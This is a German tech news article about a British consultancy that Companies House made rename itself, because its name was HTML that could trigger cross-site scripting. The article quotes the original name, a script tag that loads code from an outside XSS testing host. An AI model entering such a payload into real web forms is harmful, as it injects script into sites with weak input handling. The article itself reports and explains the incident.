Firma musste Namen ändern, weil er gefährlichen Code enthält
Bild: Pixabay
Der Name einer britischen Firma stellte ein potenzielles Sicherheitsrisiko dar und wurde geändert.
Eine britische Software-Beratungsfirma wurde von der dortigen Handelsregister-Behörde Companies House gezwungen, ihren Namen zu ändern. Der Grund: Er bestand aus HTML-Code und könne als Exploit gegen Webseiten eingesetzt werden, die ihre Webformulare nicht ausreichend gegen Cross-Site-Scripting-Angriffe (XSS) schützen.
Der Originalname:
Code:
""><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD"
So wie jene der Behörde, wie The Guardian schreibt.
Die Eingabe des Namens in ein ungesichertes Textfeld kann begünstigen, dass die dahinterliegende Anwendung glaubt, dass es sich nicht um einen Firmennamen handle, sondern diesen als HTML-Code interpretiert und ausführt. Dies kann auch in Form eines Skripts hinter einer URL erfolgen. Laut der britischen Zeitung habe das hinterlegte Skript lediglich eine harmlose Warnung ausgegeben.
Mehr dazu findest Du auf futurezone.at
Kurze URL:
Das könnte Dich auch interessieren:
Laut Insidern zieht ByteDance drastische Maßnahmen, um seinen Algorithmus zu schützen.
Um 60 Millionen Dollar jährlich darf eine nicht genanntes, großes KI-Unternehmen seine Software mit Reddit-Inhalten trainieren.
Ähnliche News:
Cyberangriff auf steirische IT-Firma
Musks Ki-Firma will Chatbot Grok zu Open Source machen
Robotersaugerfirma iRobot kämpft mit Umsatzrückgang und roten Zahlen
Chipfirma Arm profitiert von KI-Geschäft
Aircar: Chinesische Firma erwirbt europäisches Flugauto
Firma hinter Kryptowährung TerraUSD meldet Insolvenz an
Hyperverse: Krypto-Firma soll sich ihren CEO nur ausgedacht haben
Slowenische Firma errichtet Tesla-Batteriespeicher in Kärnten
Chinesische Firma errichtet 16-Megawatt-Windrad in 24 Stunden
Robotaxi-Firma Cruise passt Software nach Unfall mit Fußgängerin an
Musks Ki-Firma will Chatbot Grok zu Open Source machen
Robotersaugerfirma iRobot kämpft mit Umsatzrückgang und roten Zahlen
Chipfirma Arm profitiert von KI-Geschäft
Aircar: Chinesische Firma erwirbt europäisches Flugauto
Firma hinter Kryptowährung TerraUSD meldet Insolvenz an
Hyperverse: Krypto-Firma soll sich ihren CEO nur ausgedacht haben
Slowenische Firma errichtet Tesla-Batteriespeicher in Kärnten
Chinesische Firma errichtet 16-Megawatt-Windrad in 24 Stunden
Robotaxi-Firma Cruise passt Software nach Unfall mit Fußgängerin an
Weitere News:
"Finger-Guillotine": Cybertruck trennte fast Finger von YouTuber ab
Microsoft warnt vor Angriffswelle auf Android-Apps
Candy Crush: Priester soll Kirchengelder für Handyspiele veruntreut haben
Googles Pixel 8a komplett geleakt
Kasperskys KI angeblich in russischen Militärdrohnen
Firefox-Userin lässt 7.400 Tabs offen
Pokémon-Spieler erstellen Fake-Strände bei Openstreetmap
Microsoft erklärt Security zu seiner Top-Priorität
Neues Tool soll politische Deepfakes enttarnen
Chinesisches E-Auto für 14.500 Euro wird in Deutschland verkauft
Microsoft warnt vor Angriffswelle auf Android-Apps
Candy Crush: Priester soll Kirchengelder für Handyspiele veruntreut haben
Googles Pixel 8a komplett geleakt
Kasperskys KI angeblich in russischen Militärdrohnen
Firefox-Userin lässt 7.400 Tabs offen
Pokémon-Spieler erstellen Fake-Strände bei Openstreetmap
Microsoft erklärt Security zu seiner Top-Priorität
Neues Tool soll politische Deepfakes enttarnen
Chinesisches E-Auto für 14.500 Euro wird in Deutschland verkauft
Einen Kommentar schreiben
Kommentare
Bitte bleibe sachlich und fair in deinen Äußerungen. Sollte dein Kommentar nicht sofort erscheinen, ist er in der Warteschlange gelandet und wird meist zeitnah freigeschaltet.
(0)
Bitte bleibe sachlich und fair in deinen Äußerungen. Sollte dein Kommentar nicht sofort erscheinen, ist er in der Warteschlange gelandet und wird meist zeitnah freigeschaltet.
Kommentare:
Du hast bereits für diesen
Kommentar angestimmt...
;-)
© by Ress Design Group, 2001 - 2024